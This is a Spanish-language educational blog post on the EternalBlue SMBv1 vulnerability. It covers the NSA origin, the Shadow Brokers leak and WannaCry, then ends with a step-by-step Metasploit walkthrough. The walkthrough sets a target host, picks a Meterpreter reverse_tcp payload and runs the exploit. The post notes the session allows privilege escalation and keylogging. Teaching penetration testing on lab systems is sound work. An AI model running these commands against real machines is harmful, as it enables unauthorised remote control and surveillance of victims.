smb
metasploit
eternalblue
exploits
vulnerabilidades
Érase una vez, una vulnerabilidad que cambió la historia. Una herida abierta en el corazón de millones de sistemas Windows, un fallo silencioso que nadie vio venir… excepto quienes sabían dónde mirar. Su nombre era EternalBlue, y como todo gran cuento oscuro, comenzó en las sombras.
Corría el año 2017 cuando el mundo supo lo que algunos ya sospechaban: que los secretos más peligrosos no están en los sistemas, sino en quienes los conocen. EternalBlue era una vulnerabilidad crítica en el protocolo SMBv1 de Windows (el que permite compartir archivos e impresoras entre máquinas). Esta falla permitía que un atacante remoto ejecutara código sin autenticación, sin permisos, sin aviso. Bastaba con que el puerto 445 estuviera expuesto, y una red completa podía caer como un castillo de naipes. Pero, lo más aterrador no fue el fallo, fue descubrir quién lo conocía desde antes.
EternalBlue era parte del arsenal secreto de la NSA, la Agencia de Seguridad Nacional de Estados Unidos. Herramientas de espionaje, exploits, puertas traseras cuidadosamente construidas para infiltrar sistemas enemigos… y mantenidas en silencio durante años. Hasta que un día, alguien las filtró. Un grupo llamado Shadow Brokers liberó al mundo una caja de Pandora digital, una colección de armas cibernéticas utilizadas por la NSA, entre ellas EternalBlue y cuando el conocimiento cae en manos de todos —sin contexto, sin responsabilidad, sin control—, no tarda en llegar el caos. El 12 de mayo de 2017, una palabra se repitió en todo el mundo como un eco oscuro: WannaCry.
Un ransomware que se aprovechó de EternalBlue para propagarse como un incendio en la era digital. Afectó hospitales, gobiernos, bancos, empresas, usuarios domésticos. Bloqueó datos, exigió rescates, sembró pánico. Las pantallas se volvieron negras, los archivos inaccesibles, la productividad se detuvo y todo por no haber actualizado.
Sí, porque Microsoft ya había publicado un parche, semanas antes del ataque. Pero como ocurre tantas veces, la actualización no se aplicó. Porque el sistema funcionaba. Porque nadie tenía tiempo, porque el "mañana lo hago" fue más fuerte que el "mejor lo hago ahora". Así es como el cuento de EternalBlue no solo nos habla de una vulnerabilidad. Nos habla de negligencia, de poder mal usado, de silencio institucional y también, de oportunidad para aprender, para prevenir, para construir desde la conciencia.
Hoy puedes estudiar EternalBlue como parte de tu formación. De una arquitectura pensada en otra era, cuando la conectividad era limitada, los ataques eran menos sofisticados y el protocolo SMB —ese que permite compartir archivos e impresoras entre computadoras— se creía seguro porque vivía, supuestamente, dentro de redes confiables. SMBv1, en específico, era una pieza antigua, vieja, heredada. Como una cerradura de madera en una ciudad que ahora usa huellas digitales. Pero nadie la había reemplazado del todo. Porque seguía funcionando. Porque estaba ahí. Porque nadie pensó que podía doler tanto.
La vulnerabilidad se escondía en la forma en la que el servicio SMB manejaba las peticiones especialmente construidas. Una mala validación de memoria. Un desbordamiento. Un error de lógica en el corazón de un servicio fundamental. Un solo paquete malicioso podía romper la estructura interna del sistema operativo y permitir la ejecución de código remoto con los privilegios más altos.
Esto significa que un atacante podía simplemente enviar datos específicos al puerto 445 —el que escucha SMB— y conseguir el control total del sistema sin necesidad de contraseñas, sin interacción del usuario, sin advertencias. Era silencioso, era potente, era una obra quirúrgica y lo más escalofriante no era el exploit, era saber que había estado ahí durante años. No lo encontró un investigador independiente. No fue un equipo de seguridad el que levantó la bandera roja. Fue la NSA quien lo descubrió primero… y decidió no reportarlo, lo guardaron, lo usaron, lo convirtieron en arma y cuando ese conocimiento salió al mundo, las consecuencias fueron inmediatas. El fallo no era solo técnico, era humano, era ético, era una decisión que desató una tormenta global. EternalBlue no es solo un error de código, es el recordatorio de lo que pasa cuando lo viejo no se reemplaza, cuando lo roto no se repara, cuando lo poderoso se esconde en lugar de compartirse. Es una herida que se hizo pública porque alguien decidió guardar el dolor en vez de sanarlo y tú, que hoy estudias esta historia, no estás aquí para juzgar. Estás aquí para entender. Para mirar de frente la complejidad. Para ver que los sistemas fallan, pero lo que hacemos con esas fallas define lo que somos.
EternalBlue no fue inevitable, fue una cadena de decisiones. Puedes lanzar msfconsole, buscar el módulo, establecer el RHOST y el payload. Puedes sentir el escalofrío al ver una shell abrirse, al darte cuenta de que tienes el control. Pero sobre todo, puedes aprender que la verdadera ciberseguridad no está en la herramienta. Está en la decisión.
SMB (Server Message Block) es un protocolo de red que permite compartir archivos, impresoras y otros recursos entre computadoras dentro de una red. Está presente en sistemas Windows desde hace décadas y funciona sobre el puerto 445. Es el responsable de que puedas acceder a carpetas compartidas como \\equipo\documentos o enviar una impresión a una impresora remota. Pero como todo lo que lleva años sin reinventarse, SMBv1 —la versión antigua del protocolo— arrastraba una arquitectura débil, pensada en un tiempo donde la seguridad no era prioridad. EternalBlue aprovechó esa fragilidad. Lo hizo manipulando cómo SMBv1 gestiona ciertas peticiones malformadas, generando un desbordamiento de memoria (buffer overflow). Esto permite ejecutar código arbitrario en la máquina víctima, a nivel de sistema.
Es una ejecución remota sin autenticación. Lo que lo convierte en uno de los fallos más críticos de la historia reciente y ahora tú vas a aprender a usar esa vulnerabilidad para entenderla, estudiarla y nunca subestimarla. Antes de avanzar, necesitas una herramienta: Metasploit.
Metasploit no es magia, no es trampa, no es un botón fácil. Es una plataforma de explotación. Una colección estructurada de exploits, payloads, encoders, scanners, auxiliares y más. Es como una navaja suiza del hacking ético, diseñada para probar vulnerabilidades y demostrar lo que podría pasar si una organización no se protege.
Sus componentes más importantes:
Ahora que sabes lo que es Metasploit, vamos al campo de batalla.
Este es el camino técnico que debes recorrer para explotar EternalBlue:
Abre Metasploit
En tu terminal escribe:
1msfconsole
Busca el módulo de EternalBlue
Utiliza el buscador de módulos internos:
1search eternalblue
Selecciona el módulo
El módulo que usaremos es este (para Windows 7):
1use exploit/windows/smb/ms17_010_eternalblue
Verifica las opciones necesarias
Consulta qué parámetros debes configurar:
1show options
1set RHOSTS <ip_de_la_victima>
Selecciona un payload
Usualmente este:
1set payload windows/x64/meterpreter/reverse_tcp
Configura tu IP y puerto para el payload
Asegúrate de que LHOST sea tu IP (donde recibirás la conexión inversa):
1set LHOST <tu_ip_local> 2set LPORT 4444
Ejecuta el exploit
Aquí empieza la parte que requiere observación, paciencia y atención:
1exploit
Si todo ha salido bien, se abrirá una Meterpreter session, una shell avanzada que te permite navegar por el sistema, escalar privilegios, mover archivos, registrar pulsaciones, y mucho más.